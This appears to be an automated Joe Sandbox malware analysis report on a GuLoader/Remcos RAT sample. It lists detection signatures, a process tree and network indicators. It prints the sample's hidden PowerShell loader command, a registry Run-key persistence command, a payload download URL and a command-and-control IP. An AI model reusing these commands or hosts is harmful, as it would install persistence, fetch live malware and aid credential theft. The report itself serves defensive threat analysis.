Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SDWLLRJcsY.exe

Overview

General Information

Sample name:SDWLLRJcsY.exe
renamed because original name is a hash value
Original sample name:7bd1cce43f6b48c8ddd492e5711fd17f.exe
Analysis ID:1518329
MD5:7bd1cce43f6b48c8ddd492e5711fd17f
SHA1:3f650d8993c542682aa61c725ea1bb4ee93d259a
SHA256:c5636797b8bad3e9ff18f51d269ace0948112d9ff03a9900a174687fec4bae3b
Tags:exeGuLoaderRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Maps a DLL or memory area into another process
Powershell drops PE file
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • SDWLLRJcsY.exe (PID: 6856 cmdline: "C:\Users\user\Desktop\SDWLLRJcsY.exe" MD5: 7BD1CCE43F6B48C8DDD492E5711FD17F)
    • powershell.exe (PID: 6940 cmdline: "powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conspect124.exe (PID: 1800 cmdline: "C:\Users\user\AppData\Local\Temp\Conspect124.exe" MD5: 7BD1CCE43F6B48C8DDD492E5711FD17F)
        • cmd.exe (PID: 1988 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 3672 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • Conspect124.exe (PID: 5840 cmdline: C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\llsemopjpzfqlbiqwdrulxfexi" MD5: 7BD1CCE43F6B48C8DDD492E5711FD17F)
        • Conspect124.exe (PID: 6520 cmdline: C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\vnfxngzclhxvohwunodvwkzvgosxx" MD5: 7BD1CCE43F6B48C8DDD492E5711FD17F)
        • Conspect124.exe (PID: 3140 cmdline: C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\fhlpgzkezppayvsywzqpzpmegvkgywqb" MD5: 7BD1CCE43F6B48C8DDD492E5711FD17F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000007.00000002.4164316421.0000000006F06000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000001.00000002.3181422671.000000000B5DE000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 1 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 3672, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key
            Sigma detected: Direct Autorun Keys Modification
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1988, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)", ProcessId: 3672, ProcessName: reg.exe
            Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Conspect124.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Conspect124.exe, ParentProcessId: 1800, ParentProcessName: Conspect124.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)", ProcessId: 1988, ProcessName: cmd.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)", CommandLine: "powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SDWLLRJcsY.exe", ParentImage: C:\Users\user\Desktop\SDWLLRJcsY.exe, ParentProcessId: 6856, ParentProcessName: SDWLLRJcsY.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)", ProcessId: 6940, ProcessName: powershell.exe

            Stealing of Sensitive Information

            barindex
            Sigma detected: Remcos
            Source: Registry Key setAuthor: Joe Security: Data: Details: 00 21 BC BC 23 53 AA E8 94 9B E0 2A 08 D0 4B 56 C2 2F 8B 12 99 DA 07 CC 62 71 73 68 10 B5 BD 45 F4 15 E9 3D C8 20 16 66 6D 76 69 D1 DF 18 78 66 41 03 C0 AD 59 C2 23 8D A4 8B 34 7D 13 60 30 49 C4 1E C3 B2 0C 6C E7 38 B7 4F 74 98 AB 7C AC 6C 10 CE EE 31 AE 4D DF 7C 00 F5 B8 3C AD 78 E7 25 85 10 7A 93 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Conspect124.exe, ProcessId: 1800, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-DSGECX\exepath

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T16:01:30.828582+020020365941Malware Command and Control Activity Detected192.168.2.464860107.173.4.162404TCP
            2024-09-25T16:01:32.094273+020020365941Malware Command and Control Activity Detected192.168.2.464862107.173.4.162404TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T16:01:32.079186+020028033043Unknown Traffic192.168.2.464861178.237.33.5080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T16:01:27.983317+020028032702Potentially Bad Traffic192.168.2.464858185.26.107.5780TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://cmgtrading.eu/eODGqfP132.binAvira URL Cloud: Label: malware
            Source: http://cmgtrading.eu/eODGqfP132.binAvira URL Cloud: Label: malware
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeReversingLabs: Detection: 13%
            Multi AV Scanner detection for submitted file
            Source: SDWLLRJcsY.exeReversingLabs: Detection: 13%
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4164316421.0000000006F06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Conspect124.exe PID: 1800, type: MEMORYSTR
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,11_2_00404423
            Source: SDWLLRJcsY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 185.26.107.57:443 -> 192.168.2.4:64859 version: TLS 1.2
            Source: SDWLLRJcsY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbr source: powershell.exe, 00000001.00000002.3164322677.0000000002889000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ore.pdbK source: powershell.exe, 00000001.00000002.3172185585.00000000072D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.3172185585.00000000072D0000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeCode function: 0_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040595A
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeCode function: 0_2_0040658F FindFirstFileW,FindClose,0_2_0040658F
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_0040595A
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_00402862 FindFirstFileW,7_2_00402862
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_0040658F FindFirstFileW,FindClose,7_2_0040658F
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_23BC10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_23BC10F1
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\intercessionate\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:64860 -> 107.173.4.16:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:64862 -> 107.173.4.16:2404
            Source: global trafficTCP traffic: 192.168.2.4:64860 -> 107.173.4.16:2404
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 185.26.107.57 185.26.107.57
            Source: Joe Sandbox ViewIP Address: 107.173.4.16 107.173.4.16
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:64861 -> 178.237.33.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:64858 -> 185.26.107.57:80
            Source: global trafficHTTP traffic detected: GET /eODGqfP132.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: cmgtrading.euConnection: Keep-AliveCookie: SERVID=B
            Source: global trafficHTTP traffic detected: GET /eODGqfP132.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: cmgtrading.euCache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: unknownTCP traffic detected without corresponding DNS query: 107.173.4.16
            Source: global trafficHTTP traffic detected: GET /eODGqfP132.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: cmgtrading.euConnection: Keep-AliveCookie: SERVID=B
            Source: global trafficHTTP traffic detected: GET /eODGqfP132.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: cmgtrading.euCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Conspect124.exe, 00000007.00000002.4177334416.0000000023B90000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
            Source: Conspect124.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
            Source: Conspect124.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: global trafficDNS traffic detected: DNS query: cmgtrading.eu
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: Conspect124.exe, 00000007.00000002.4176574564.0000000022B70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cmgtrading.eu/eODGqfP132.bin
            Source: Conspect124.exe, 00000007.00000002.4164560260.0000000006F8C000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189601872.0000000006F8C000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006EC8000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3182004539.0000000006F8B000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189748673.0000000006F8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: Conspect124.exe, 00000007.00000002.4164316421.0000000006EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp.
            Source: Conspect124.exe, 00000007.00000002.4164316421.0000000006EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp5
            Source: Conspect124.exe, 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpd
            Source: Conspect124.exe, 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
            Source: Conspect124.exe, 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gplH
            Source: Conspect124.exe, 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Conspect124.exe, 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpy
            Source: SDWLLRJcsY.exe, 00000000.00000000.1682153020.000000000040A000.00000008.00000001.01000000.00000003.sdmp, SDWLLRJcsY.exe, 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Conspect124.exe, 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.3170024111.00000000059C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.3165842490.0000000004AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.3165842490.0000000004961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.3165842490.0000000004AB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Conspect124.exeString found in binary or memory: http://www.ebuddy.com
            Source: Conspect124.exeString found in binary or memory: http://www.imvu.com
            Source: Conspect124.exe, 00000007.00000002.4177334416.0000000023B90000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
